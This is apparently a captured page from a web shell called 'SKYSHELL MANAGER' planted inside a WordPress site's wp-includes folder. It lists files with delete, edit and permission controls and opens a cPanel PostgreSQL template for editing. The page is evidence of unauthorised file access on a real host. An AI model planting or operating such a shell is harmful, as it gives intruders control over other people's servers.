📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: deluserfromdb.html.tt
[% SET CPANEL.CPVAR.dprefix = "../"; SET result = execute('Postgresql', 'revoke_all_privileges', { 'user' => RAW_FORM.user, 'database' => RAW_FORM.db, } ); %] [% WRAPPER '_assets/master.html.tt' app_key = 'postgresql_databases' -%] <div class="body-content"> [% IF result.status %] <div id="descSuccess" class="alert alert-success"> <span id="descSuccessImg" class="glyphicon glyphicon-ok-sign"></span> <div id="descSuccessMsg" class="alert-message"> [% locale.maketext("Deleted the user “[_1]” from the database “[_2]”.", FORM.user, FORM.db) %] </div> </div> [% ELSE %] [% IF result.errors.size %] [% FOREACH message IN result.errors %] <div class="alert alert-danger" role="alert"> <span class="glyphicon glyphicon-remove-sign" aria-hidden="true"></span> <div class="alert-message"> <strong class="alert-title"> [% locale.maketext('Error:') %] </strong> <span class="alert-body"> <span id="error-[% loop.index() %]"> [% message.html() %] </span> </span> </div> </div> [% END %] [% END %] [% END %] [% INCLUDE _assets/return_link.html.tt return_location='index.html' return_link_text=locale.maketext('Go Back') %] </div> [% END #wrapper %]
Save